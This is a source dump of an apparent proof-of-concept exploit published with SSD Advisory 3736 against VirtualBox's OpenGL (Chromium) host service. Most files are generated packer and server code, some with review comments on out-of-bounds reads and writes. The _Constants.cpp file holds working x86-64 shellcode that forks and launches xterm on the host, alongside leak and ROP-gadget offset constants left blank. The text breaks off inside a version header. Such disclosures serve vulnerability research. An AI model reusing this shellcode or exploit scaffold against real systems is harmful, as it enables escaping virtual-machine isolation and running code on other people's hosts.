*/ 19 | 20 | unsigned char *data_ptr; 21 | int len_aligned, total_len; 22 | 23 | CR_LOCK_PACKER_CONTEXT(pc); 24 | 25 | data_ptr = pc->buffer.data_current; 26 | len_aligned = ( len + 0x3 ) & ~0x3; 27 | total_len = 24 + len_aligned; 28 | 29 | WRITE_DATA(0, int, SWAP32(total_len)); 30 | WRITE_DATA(4, int, SWAP32(bounds->x1)); 31 | WRITE_DATA(8, int, SWAP32(bounds->y1)); 32 | WRITE_DATA(12, int, SWAP32(bounds->x2)); 33 | WRITE_DATA(16, int, SWAP32(bounds->y2)); 34 | WRITE_DATA(20, int, SWAP32(num_opcodes)); 35 | 36 | /* skip the BOUNDSINFO */ 37 | data_ptr += 24; 38 | 39 | /* put in padding opcodes (deliberately bogus) */ 40 | switch ( len_aligned - len ) 41 | { 42 | case 3: *data_ptr++ = 0xff; RT_FALL_THRU(); 43 | case 2: *data_ptr++ = 0xff; RT_FALL_THRU(); 44 | case 1: *data_ptr++ = 0xff; RT_FALL_THRU(); 45 | default: break; 46 | } 47 | 48 | crMemcpy( data_ptr, payload, len ); 49 | 50 | WRITE_OPCODE( pc, CR_BOUNDSINFOCR_OPCODE ); 51 | pc->buffer.data_current += 24 + len_aligned; 52 | CR_UNLOCK_PACKER_CONTEXT(pc); 53 | } 54 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_clipplane_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_clipplane.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 
8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | 13 | void PACK_APIENTRY crPackClipPlaneSWAP( GLenum plane, const GLdouble *equation ) 14 | { 15 | CR_GET_PACKER_CONTEXT(pc); 16 | unsigned char *data_ptr; 17 | int packet_length = sizeof( plane ) + 4*sizeof(*equation); 18 | CR_GET_BUFFERED_POINTER(pc, packet_length ); 19 | WRITE_DATA(0, GLenum, SWAP32(plane)); 20 | WRITE_SWAPPED_DOUBLE( 4, equation[0] ); 21 | WRITE_SWAPPED_DOUBLE( 12, equation[1] ); 22 | WRITE_SWAPPED_DOUBLE( 20, equation[2] ); 23 | WRITE_SWAPPED_DOUBLE( 28, equation[3] ); 24 | WRITE_OPCODE( pc, CR_CLIPPLANE_OPCODE ); 25 | CR_UNLOCK_PACKER_CONTEXT(pc); 26 | } 27 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_fog_swap.c: -------------------------------------------------------------------------------- 1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_fog.c BY pack_swap.py */ 2 | 3 | 4 | /* Copyright (c) 2001, Stanford University 5 | * All rights reserved 6 | * 7 | * See the file LICENSE.txt for information on redistributing this software. 
8 | */ 9 | 10 | #include "packer.h" 11 | #include "cr_opcodes.h" 12 | 13 | static GLboolean __handleFogData( GLenum pname, const GLfloat *params ) 14 | { 15 | CR_GET_PACKER_CONTEXT(pc); 16 | int params_length = 0; 17 | int packet_length = sizeof( int ) + sizeof( pname ); 18 | unsigned char *data_ptr; 19 | switch( pname ) 20 | { 21 | case GL_FOG_MODE: 22 | case GL_FOG_DENSITY: 23 | case GL_FOG_START: 24 | case GL_FOG_END: 25 | case GL_FOG_INDEX: 26 | params_length = sizeof( *params ); 27 | break; 28 | case GL_FOG_COLOR: 29 | params_length = 4*sizeof( *params ); 30 | break; 31 | default: 32 | params_length = __packFogParamsLength( pname ); 33 | if (!params_length) 34 | { 35 | char msg[100]; 36 | sprintf(msg, "Invalid pname in Fog: %d", (int) pname ); 37 | __PackError( __LINE__, __FILE__, GL_INVALID_ENUM, msg); 38 | return GL_FALSE; 39 | } 40 | break; 41 | } 42 | packet_length += params_length; 43 | 44 | CR_GET_BUFFERED_POINTER(pc, packet_length ); 45 | WRITE_DATA(0, int, SWAP32(packet_length)); 46 | WRITE_DATA(4, GLenum, SWAP32(pname)); 47 | WRITE_DATA(8, GLuint, SWAPFLOAT(params[0])); 48 | if (packet_length > 12) 49 | { 50 | WRITE_DATA(12, GLuint, SWAPFLOAT(params[1])); 51 | WRITE_DATA(16, GLuint, SWAPFLOAT(params[2])); 52 | WRITE_DATA(20, GLuint, SWAPFLOAT(params[3])); 53 | } 54 | return GL_TRUE; 55 | } 56 | 57 | void PACK_APIENTRY crPackFogfvSWAP(GLenum pname, const GLfloat *params) 58 | { 59 | CR_GET_PACKER_CONTEXT(pc); 60 | if (__handleFogData( pname, params )) 61 | WRITE_OPCODE( pc, CR_FOGFV_OPCODE ); 62 | CR_UNLOCK_PACKER_CONTEXT(pc); 63 | } 64 | 65 | void PACK_APIENTRY crPackFogivSWAP(GLenum pname, const GLint *params) 66 | { 67 | CR_GET_PACKER_CONTEXT(pc); 68 | /* floats and ints are the same size, so the packing should be the same */ 69 | if (__handleFogData( pname, (const GLfloat *) params )) 70 | WRITE_OPCODE( pc, CR_FOGIV_OPCODE ); 71 | CR_UNLOCK_PACKER_CONTEXT(pc); 72 | } 73 | 
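--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_materials_swap.c:
--------------------------------------------------------------------------------
/* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_materials.c BY pack_swap.py */


/* Copyright (c) 2001, Stanford University
 * All rights reserved
 *
 * See the file LICENSE.txt for information on redistributing this software.
 */

#include "packer.h"
#include "cr_error.h"

/*
 * Byte-swapping packer shared by crPackMaterialfvSWAP and
 * crPackMaterialivSWAP.
 *
 * Packet layout: offset 0 holds the total packet length, followed by face,
 * pname and then one, three or four parameters depending on pname.
 *
 * Returns GL_TRUE after the packet has been written and GL_FALSE, after
 * reporting GL_INVALID_ENUM through __PackError, for an unknown pname.
 *
 * Two defects of the generated code are corrected here:
 *  - The fourth parameter was guarded by packet_length, which is at least
 *    16 bytes and therefore always exceeded 3*sizeof(*params).  params[3]
 *    was read, and written at offset 24, even for GL_SHININESS (16-byte
 *    packet) and GL_COLOR_INDEXES (24-byte packet): an out-of-bounds read
 *    of the caller's array and a write past the space reserved with
 *    CR_GET_BUFFERED_POINTER.  The guard now tests params_length.
 *  - The helper returned void, so the callers wrote an opcode even when no
 *    payload had been packed.  It now reports success like the other
 *    __handle*Data helpers.
 *
 * NOTE(review): the header says this file is generated from
 * pack_materials.c by pack_swap.py, so the same fix belongs in that source.
 */
static GLboolean __handleMaterialData( GLenum face, GLenum pname, const GLfloat *params )
{
    CR_GET_PACKER_CONTEXT(pc);
    unsigned int packet_length = sizeof( int ) + sizeof( face ) + sizeof( pname );
    unsigned int params_length = 0;
    unsigned char *data_ptr;
    switch( pname )
    {
        case GL_AMBIENT:
        case GL_DIFFUSE:
        case GL_SPECULAR:
        case GL_EMISSION:
        case GL_AMBIENT_AND_DIFFUSE:
            params_length = 4*sizeof( *params );
            break;
        case GL_COLOR_INDEXES:
            params_length = 3*sizeof( *params );
            break;
        case GL_SHININESS:
            params_length = sizeof( *params );
            break;
        default:
            __PackError(__LINE__, __FILE__, GL_INVALID_ENUM, "glMaterial(pname)");
            return GL_FALSE;
    }
    packet_length += params_length;

    CR_GET_BUFFERED_POINTER(pc, packet_length );
    WRITE_DATA(0, int, SWAP32(packet_length));
    WRITE_DATA(sizeof( int ) + 0, GLenum, SWAP32(face));
    WRITE_DATA(sizeof( int ) + 4, GLenum, SWAP32(pname));
    WRITE_DATA(sizeof( int ) + 8, GLuint, SWAPFLOAT(params[0]));
    if (params_length > sizeof( *params ))
    {
        WRITE_DATA(sizeof( int ) + 12, GLuint, SWAPFLOAT(params[1]));
        WRITE_DATA(sizeof( int ) + 16, GLuint, SWAPFLOAT(params[2]));
    }
    /* Only four-element pnames carry a fourth value. */
    if (params_length > 3*sizeof( *params ) )
    {
        WRITE_DATA(sizeof( int ) + 20, GLuint, SWAPFLOAT(params[3]));
    }
    return GL_TRUE;
}

/*
 * Packs a Materialfv call; the opcode is written only when the payload was
 * accepted by __handleMaterialData.
 */
void PACK_APIENTRY crPackMaterialfvSWAP(GLenum face, GLenum pname, const GLfloat *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    if (__handleMaterialData( face, pname, params ))
        WRITE_OPCODE( pc, CR_MATERIALFV_OPCODE );
    CR_UNLOCK_PACKER_CONTEXT(pc);
}

/*
 * Packs a Materialiv call through the float path; the opcode is written
 * only when the payload was accepted by __handleMaterialData.
 */
void PACK_APIENTRY crPackMaterialivSWAP(GLenum face, GLenum pname, const GLint *params)
{
    /* floats and ints are the same size, so the packing should be the same */
    CR_GET_PACKER_CONTEXT(pc);
    if (__handleMaterialData( face, pname, (const GLfloat *) params ))
        WRITE_OPCODE( pc, CR_MATERIALIV_OPCODE );
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_regcombiner_swap.c:
--------------------------------------------------------------------------------
/* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_regcombiner.c BY pack_swap.py */


/* Copyright (c) 2001, Stanford University
 * All rights reserved
 *
 * See the file LICENSE.txt for information on redistributing this software.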
*/

#include "packer.h"
#include "cr_opcodes.h"

/*
 * Byte-swapping packer shared by the CombinerParameterfvNV and
 * CombinerParameterivNV entry points.
 *
 * Packet layout: offset 0 holds the total packet length, followed by the
 * extended opcode, pname and then one or four parameters depending on pname.
 *
 * Returns GL_TRUE after the packet has been written.  For an unknown pname
 * it reports GL_INVALID_ENUM through __PackError, asserts, and returns
 * GL_FALSE without writing anything.
 *
 * NOTE(review): params carries no element count; the caller must supply
 * four elements for the two GL_CONSTANT_COLOR*_NV names.
 */
static GLboolean __handleCombinerParameterData(GLenum pname, const GLfloat *params, GLenum extended_opcode)
{
    CR_GET_PACKER_CONTEXT(pc);
    unsigned int value_bytes = 0;
    unsigned int packet_length = sizeof(int) + sizeof(extended_opcode) + sizeof(pname);
    unsigned char *data_ptr;

    if (pname == GL_CONSTANT_COLOR0_NV || pname == GL_CONSTANT_COLOR1_NV)
    {
        value_bytes = 4 * sizeof(*params);
    }
    else if (pname == GL_NUM_GENERAL_COMBINERS_NV || pname == GL_COLOR_SUM_CLAMP_NV)
    {
        value_bytes = sizeof(*params);
    }
    else
    {
        __PackError(__LINE__, __FILE__, GL_INVALID_ENUM,
                    "crPackCombinerParameterSWAP(bad pname)");
        CRASSERT(0);
        return GL_FALSE;
    }

    packet_length += value_bytes;
    CR_GET_BUFFERED_POINTER(pc, packet_length);
    WRITE_DATA(0, int, SWAP32(packet_length));
    WRITE_DATA(sizeof(int) + 0, GLenum, SWAP32(extended_opcode));
    WRITE_DATA(sizeof(int) + 4, GLenum, SWAP32(pname));
    WRITE_DATA(sizeof(int) + 8, GLuint, SWAPFLOAT(params[0]));

    /* One-element names are complete at this point. */
    if (value_bytes <= sizeof(*params))
        return GL_TRUE;

    WRITE_DATA(sizeof(int) + 12, GLuint, SWAPFLOAT(params[1]));
    WRITE_DATA(sizeof(int) + 16, GLuint, SWAPFLOAT(params[2]));
    WRITE_DATA(sizeof(int) + 20, GLuint, SWAPFLOAT(params[3]));
    CRASSERT(packet_length == sizeof(int) + 20 + 4);
    return GL_TRUE;
}

/*
 * Packs CombinerParameterfvNV as an extended opcode; the opcode is written
 * only when the payload was accepted.
 */
void PACK_APIENTRY crPackCombinerParameterfvNVSWAP(GLenum pname, const GLfloat *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    GLboolean packed = __handleCombinerParameterData(pname, params, CR_COMBINERPARAMETERFVNV_EXTEND_OPCODE);
    if (packed)
        WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
    CR_UNLOCK_PACKER_CONTEXT(pc);
}

/*
 * Packs CombinerParameterivNV through the float path; the opcode is written
 * only when the payload was accepted.
 */
void PACK_APIENTRY crPackCombinerParameterivNVSWAP(GLenum pname, const GLint *params)
{
    /* floats and ints are the same size, so the packing should be the same */
    CR_GET_PACKER_CONTEXT(pc);
    GLboolean packed = __handleCombinerParameterData(pname, (const GLfloat *) params, CR_COMBINERPARAMETERIVNV_EXTEND_OPCODE);
    if (packed)
        WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
    CR_UNLOCK_PACKER_CONTEXT(pc);
}

/*
 * Packs CombinerStageParameterfvNV as a fixed 32-byte extended packet:
 * length, extended opcode, stage, pname, then four parameters.
 *
 * NOTE(review): pname is not inspected here and four elements of params are
 * always read, so the caller must supply at least four.
 */
void PACK_APIENTRY crPackCombinerStageParameterfvNVSWAP(GLenum stage, GLenum pname, const GLfloat *params)
{
    CR_GET_PACKER_CONTEXT(pc);
    unsigned char *data_ptr;
    int k;

    CR_GET_BUFFERED_POINTER(pc, 32);
    WRITE_DATA(0, GLint, SWAP32(32));
    WRITE_DATA(4, GLenum, SWAP32(CR_COMBINERSTAGEPARAMETERFVNV_EXTEND_OPCODE));
    WRITE_DATA(8, GLenum, SWAP32(stage));
    WRITE_DATA(12, GLenum, SWAP32(pname));
    /* The four values occupy offsets 16, 20, 24 and 28. */
    for (k = 0; k < 4; k++)
    {
        WRITE_DATA(16 + 4*k, GLuint, SWAPFLOAT(params[k]));
    }
    WRITE_OPCODE(pc, CR_EXTEND_OPCODE);
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_stipple_swap.c:
--------------------------------------------------------------------------------
/* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_stipple.c BY pack_swap.py */


/* Copyright (c) 2001, Stanford University
 * All rights reserved
 *
 * See the file LICENSE.txt for information on redistributing this software.
*/

#include "packer.h"
#include "cr_opcodes.h"
#include "cr_mem.h"
#include "cr_glstate.h"

/*
 * Packs a PolygonStipple call.
 *
 * The packet starts with a byte-swapped "nodata" flag taken from
 * crStateIsBufferBound(GL_PIXEL_UNPACK_BUFFER_ARB).  When the flag is set,
 * mask is not dereferenced: its value is cast to GLint and sent in place of
 * the pattern.  Otherwise 32*32/8 = 128 bytes are copied from mask.
 *
 * NOTE(review): the (GLint)(uintptr_t) cast keeps only the low 32 bits of
 * mask; presumably mask is a buffer offset in that mode -- confirm.  In the
 * copy path mask is not checked for NULL and must reference 128 readable
 * bytes.
 */
void PACK_APIENTRY crPackPolygonStippleSWAP( const GLubyte *mask )
{
    CR_GET_PACKER_CONTEXT(pc);
    unsigned char *data_ptr;
    int nodata = crStateIsBufferBound(GL_PIXEL_UNPACK_BUFFER_ARB);
    /* Flag word plus either the pointer value or the full pattern. */
    int packet_length = sizeof(int) + (nodata ? sizeof(GLint) : 32*32/8);

    CR_GET_BUFFERED_POINTER(pc, packet_length );
    WRITE_DATA_AI(int, SWAP32(nodata));
    if (!nodata)
    {
        crMemcpy( data_ptr, mask, 32*32/8 );
    }
    else
    {
        WRITE_DATA_AI(GLint, SWAP32((GLint)(uintptr_t)mask));
    }
    WRITE_OPCODE( pc, CR_POLYGONSTIPPLE_OPCODE );
    CR_UNLOCK_PACKER_CONTEXT(pc);
}
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/packspu_flush.c:
--------------------------------------------------------------------------------
/* Copyright (c) 2001, Stanford University
   All rights reserved.

   See the file LICENSE.txt for information on redistributing this software. */


/* DO NOT EDIT - this file generated by packspu_flush.py script */

/* These are otherwise ordinary functions which require that the buffer be
 * flushed immediately after packing the function.
*/
#include "cr_glstate.h"
#include "cr_packfunctions.h"
#include "packspu.h"
#include "packspu_proto.h"

/*
 * Every wrapper below has the same shape: pack the call with the SWAP
 * variant when pack_spu.swap is set and with the plain variant otherwise,
 * then flush the buffer for the current thread.
 */

/* Packs BarrierCreateCR(name, count) and flushes. */
void PACKSPU_APIENTRY packspu_BarrierCreateCR(GLuint name, GLuint count)
{
    GET_THREAD(thread);
    if (pack_spu.swap) {
        crPackBarrierCreateCRSWAP(name, count);
    } else {
        crPackBarrierCreateCR(name, count);
    }
    packspuFlush( (void *) thread );
}

/* Packs BarrierExecCR(name) and flushes. */
void PACKSPU_APIENTRY packspu_BarrierExecCR(GLuint name)
{
    GET_THREAD(thread);
    if (pack_spu.swap) {
        crPackBarrierExecCRSWAP(name);
    } else {
        crPackBarrierExecCR(name);
    }
    packspuFlush( (void *) thread );
}

/* Packs SemaphoreCreateCR(name, count) and flushes. */
void PACKSPU_APIENTRY packspu_SemaphoreCreateCR(GLuint name, GLuint count)
{
    GET_THREAD(thread);
    if (pack_spu.swap) {
        crPackSemaphoreCreateCRSWAP(name, count);
    } else {
        crPackSemaphoreCreateCR(name, count);
    }
    packspuFlush( (void *) thread );
}

/* Packs SemaphorePCR(name) and flushes. */
void PACKSPU_APIENTRY packspu_SemaphorePCR(GLuint name)
{
    GET_THREAD(thread);
    if (pack_spu.swap) {
        crPackSemaphorePCRSWAP(name);
    } else {
        crPackSemaphorePCR(name);
    }
    packspuFlush( (void *) thread );
}

/* Packs SemaphoreVCR(name) and flushes. */
void PACKSPU_APIENTRY packspu_SemaphoreVCR(GLuint name)
{
    GET_THREAD(thread);
    if (pack_spu.swap) {
        crPackSemaphoreVCRSWAP(name);
    } else {
        crPackSemaphoreVCR(name);
    }
    packspuFlush( (void *) thread );
}

--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/server_retval.c:
--------------------------------------------------------------------------------
/* Copyright (c) 2001, Stanford University
   All rights reserved.

   See the file LICENSE.txt for information on redistributing this software.
*/


/* DO NOT EDIT - THIS FILE AUTOMATICALLY GENERATED BY server_retval.py SCRIPT */
#include "chromium.h"
#include "cr_mem.h"
#include "cr_net.h"
#include "server_dispatch.h"
#include "server.h"

/*
 * Sends payload back to the current client as a CR_MESSAGE_READBACK message.
 *
 * The reply is a CRMessageReadback header followed by payload_len bytes of
 * payload; the header's writeback_ptr and readback_ptr fields are copied
 * from cr_server.writeback_ptr and cr_server.return_ptr.
 *
 * Nothing is sent when pended commands are being processed, when
 * cr_server.bIsInLoadingState is set, or when the client connection is of
 * type CR_FILE.
 *
 * NOTE(review): msg_len is a signed int formed from sizeof(*rb) +
 * payload_len with no overflow check.  Every caller visible in this file
 * passes sizeof(retval), but a large payload_len from a caller elsewhere
 * would under-allocate rb ahead of the payload crMemcpy -- confirm that all
 * callers bound it.  The crAlloc result is also used unchecked; confirm
 * crAlloc cannot return NULL.
 */
void crServerReturnValue( const void *payload, unsigned int payload_len )
{
    CRMessageReadback *rb;
    int msg_len = sizeof( *rb ) + payload_len;

    if (cr_server.fProcessingPendedCommands)
    {
        /* No reply in this mode; only the two pointer slots are reset. */
#ifdef DEBUG_misha
        WARN(("Pending command returns value"));
#endif
        CRDBGPTR_SETZ(&cr_server.writeback_ptr);
        CRDBGPTR_SETZ(&cr_server.return_ptr);
        return;
    }

    /* Don't reply to client if we're loading VM snapshot,
     * and there is nobody to reply to on a CR_FILE connection. */
    if (cr_server.bIsInLoadingState || cr_server.curClient->conn->type == CR_FILE)
        return;

    rb = (CRMessageReadback *) crAlloc( msg_len );

    rb->header.type = CR_MESSAGE_READBACK;
    CRDBGPTR_PRINTRB(cr_server.curClient->conn->u32ClientID, &cr_server.writeback_ptr);
    CRDBGPTR_CHECKNZ(&cr_server.writeback_ptr);
    CRDBGPTR_CHECKNZ(&cr_server.return_ptr);
    crMemcpy( &(rb->writeback_ptr), &(cr_server.writeback_ptr), sizeof( rb->writeback_ptr ) );
    crMemcpy( &(rb->readback_ptr), &(cr_server.return_ptr), sizeof( rb->readback_ptr ) );
    /* The payload sits directly after the header. */
    crMemcpy( rb+1, payload, payload_len );
    crNetSend( cr_server.curClient->conn, NULL, rb, msg_len );
    CRDBGPTR_SETZ(&cr_server.writeback_ptr);
    CRDBGPTR_SETZ(&cr_server.return_ptr);
    crFree( rb );
}

/*
 * Each dispatcher below calls the matching head SPU entry, hands the result
 * to crServerReturnValue, and also returns it to its own caller.
 */

GLenum SERVER_DISPATCH_APIENTRY crServerDispatchCheckFramebufferStatusEXT(GLenum target)
{
    GLenum retval = cr_server.head_spu->dispatch_table.CheckFramebufferStatusEXT(target);
    crServerReturnValue( &retval, sizeof(retval) );
    return retval; /* WILL PROBABLY BE IGNORED */
}

GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsEnabled(GLenum cap)
{
    GLboolean retval = cr_server.head_spu->dispatch_table.IsEnabled(cap);
    crServerReturnValue( &retval, sizeof(retval) );
    return retval; /* WILL PROBABLY BE IGNORED */
}

GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsFenceNV(GLuint fence)
{
    GLboolean retval = cr_server.head_spu->dispatch_table.IsFenceNV(fence);
    crServerReturnValue( &retval, sizeof(retval) );
    return retval; /* WILL PROBABLY BE IGNORED */
}

GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchIsQueryARB(GLuint id)
{
    GLboolean retval = cr_server.head_spu->dispatch_table.IsQueryARB(id);
    crServerReturnValue( &retval, sizeof(retval) );
    return retval; /* WILL PROBABLY BE IGNORED */
}

GLint SERVER_DISPATCH_APIENTRY crServerDispatchRenderMode(GLenum mode)
{
    GLint retval = cr_server.head_spu->dispatch_table.RenderMode(mode);
    crServerReturnValue( &retval, sizeof(retval) );
    return retval; /* WILL PROBABLY BE IGNORED */
}

GLboolean SERVER_DISPATCH_APIENTRY crServerDispatchTestFenceNV(GLuint fence)
{
    GLboolean retval = cr_server.head_spu->dispatch_table.TestFenceNV(fence);
    crServerReturnValue( &retval, sizeof(retval) );
    return retval; /* WILL PROBABLY BE IGNORED */
}
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/state_line_gen.c:
--------------------------------------------------------------------------------
/* This code is AUTOGENERATED!!!
*/ 2 | 3 | #include "state.h" 4 | #include "state_internals.h" 5 | 6 | void crStateLineDiff(CRLineBits *b, CRbitvalue *bitID, 7 | CRContext *fromCtx, CRContext *toCtx) 8 | { 9 | CRLineState *from = &(fromCtx->line); 10 | CRLineState *to = &(toCtx->line); 11 | unsigned int j, i; 12 | CRbitvalue nbitID[CR_MAX_BITARRAY]; 13 | for (j = 0; jenable, bitID)) 17 | { 18 | glAble able[2]; 19 | able[0] = diff_api.Disable; 20 | able[1] = diff_api.Enable; 21 | if (from->lineSmooth != to->lineSmooth) 22 | { 23 | able[to->lineSmooth](GL_LINE_SMOOTH); 24 | from->lineSmooth = to->lineSmooth; 25 | } 26 | if (from->lineStipple != to->lineStipple) 27 | { 28 | able[to->lineStipple](GL_LINE_STIPPLE); 29 | from->lineStipple = to->lineStipple; 30 | } 31 | CLEARDIRTY(b->enable, nbitID); 32 | } 33 | if (CHECKDIRTY(b->width, bitID)) 34 | { 35 | if (from->width != to->width) 36 | { 37 | diff_api.LineWidth(to->width); 38 | from->width = to->width; 39 | } 40 | CLEARDIRTY(b->width, nbitID); 41 | } 42 | if (to->lineStipple) 43 | { 44 | if (CHECKDIRTY(b->stipple, bitID)) 45 | { 46 | if (from->repeat != to->repeat || 47 | from->pattern != to->pattern) 48 | { 49 | diff_api.LineStipple(to->repeat, 50 | to->pattern); 51 | from->repeat = to->repeat; 52 | from->pattern = to->pattern; 53 | } 54 | CLEARDIRTY(b->stipple, nbitID); 55 | } 56 | } /*lineStipple*/ 57 | CLEARDIRTY(b->dirty, nbitID); 58 | } 59 | 60 | void crStateLineSwitch(CRLineBits *b, CRbitvalue *bitID, 61 | CRContext *fromCtx, CRContext *toCtx) 62 | { 63 | CRLineState *from = &(fromCtx->line); 64 | CRLineState *to = &(toCtx->line); 65 | unsigned int j, i; 66 | CRbitvalue nbitID[CR_MAX_BITARRAY]; 67 | for (j = 0; jenable, bitID)) 71 | { 72 | glAble able[2]; 73 | able[0] = diff_api.Disable; 74 | able[1] = diff_api.Enable; 75 | if (from->lineSmooth != to->lineSmooth) 76 | { 77 | able[to->lineSmooth](GL_LINE_SMOOTH); 78 | FILLDIRTY(b->enable); 79 | FILLDIRTY(b->dirty); 80 | } 81 | if (from->lineStipple != to->lineStipple) 82 | { 83 | 
able[to->lineStipple](GL_LINE_STIPPLE); 84 | FILLDIRTY(b->enable); 85 | FILLDIRTY(b->dirty); 86 | } 87 | CLEARDIRTY(b->enable, nbitID); 88 | } 89 | if (CHECKDIRTY(b->width, bitID)) 90 | { 91 | if (from->width != to->width) 92 | { 93 | diff_api.LineWidth(to->width); 94 | FILLDIRTY(b->width); 95 | FILLDIRTY(b->dirty); 96 | } 97 | CLEARDIRTY(b->width, nbitID); 98 | } 99 | if (CHECKDIRTY(b->stipple, bitID)) 100 | { 101 | if (from->repeat != to->repeat || 102 | from->pattern != to->pattern) 103 | { 104 | diff_api.LineStipple(to->repeat, 105 | to->pattern); 106 | FILLDIRTY(b->stipple); 107 | FILLDIRTY(b->dirty); 108 | } 109 | CLEARDIRTY(b->stipple, nbitID); 110 | } 111 | CLEARDIRTY(b->dirty, nbitID); 112 | } 113 | 114 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/_Constants.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | /****************************************************************************** 4 | * Exploit's contants - if something not works, consider to review them 5 | ******************************************************************************/ 6 | 7 | /* Removed for the sake of PoC */ 8 | ULONGLONG OffsetFromOglToLeakedAddr = ???; // VBoxSharedCrOpenGL.so 9 | ULONGLONG OffsetFromVboxddToLeakedAddr = ???; // VBoxDD.so 10 | ULONGLONG OffsetFromOglToVramPtr = ???; // g_pvVRamBase 11 | ULONGLONG OffsetFromVboxddToRopGadget = ???; 12 | 13 | UCHAR gShellcode[] = 14 | "\x48\xC7\xC0\x3A\x00\x00\x00" // mov rax, 00000003A 15 | "\x0F\x05" // syscall 16 | "\x48\x85\xC0" // test rax, rax 17 | "\x75\x3A" // jnz 000000048 18 | "\x48\x8D\x35\x4E\x00\x00\x00" // lea rsi, [000000063] 19 | "\x48\x89\x35\x6B\x00\x00\x00" // mov [000000087], rsi 20 | "\x48\x8D\x35\x57\x00\x00\x00" // lea rsi, [00000007A] 21 | "\x48\x89\x35\x6D\x00\x00\x00" // mov [000000097], rsi 22 | "\x48\x8D\x3D\x32\x00\x00\x00" // lea rdi, [000000063] 23 | 
"\x48\x8D\x35\x4F\x00\x00\x00" // lea rsi, [000000087] 24 | "\x48\x8D\x15\x58\x00\x00\x00" // lea rdx, [000000097] 25 | "\x48\xC7\xC0\x3B\x00\x00\x00" // mov rax, 00000003B 26 | "\x0F\x05" // syscall 27 | "\x48\x8B\xBC\x24\xB8\x01\x00\x00" // mov rdi, [rsp][0000002D8] 28 | "\x48\x81\xC5\x80\x03\x00\x00" // add rbp, 0000002D0 29 | "\x48\x81\xC4\xC0\x01\x00\x00" // add rsp, 0000002E0 30 | "\x48\x31\xC0" // xor rax, rax 31 | "\x57" // push rdi 32 | "\xC3" // retn 33 | "\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x78\x74\x65\x72\x6D\x00\x00\x00\x00\x00\x00\x00\x00\x00" // "/usr/bin/xterm" 34 | "\x44\x49\x53\x50\x4C\x41\x59\x3D\x3A\x30\x2E\x30\x00" // "DISPLAY=:0.0" 35 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // argv[] 36 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; // envp[] 37 | 38 | SIZE_T gShellcodeSize = sizeof(gShellcode); 39 | 40 | /****************************************************************************** 41 | * End of exploit's contants 42 | ******************************************************************************/ 43 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/product-generated.h: -------------------------------------------------------------------------------- 1 | #ifndef ___product_generated_h___ 2 | #define ___product_generated_h___ 3 | 4 | #define VBOX_VENDOR "Oracle Corporation" 5 | #define VBOX_VENDOR_SHORT "Oracle" 6 | #define VBOX_PRODUCT "Oracle VM VirtualBox" 7 | #define VBOX_BUILD_PUBLISHER "_OSE" 8 | #define VBOX_C_YEAR "2018" 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/version-generated.h: -------------------------------------------------------------------------------- 1 | #ifndef ___version_generated_h___ 2 | #define ___version_generated_h___ 3 | 4 | #define VBOX_VERSION_MAJOR 5 5 | 
